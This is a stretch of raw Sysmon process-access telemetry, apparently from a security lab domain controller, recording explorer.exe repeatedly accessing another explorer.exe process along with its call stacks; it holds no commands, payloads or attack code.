16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 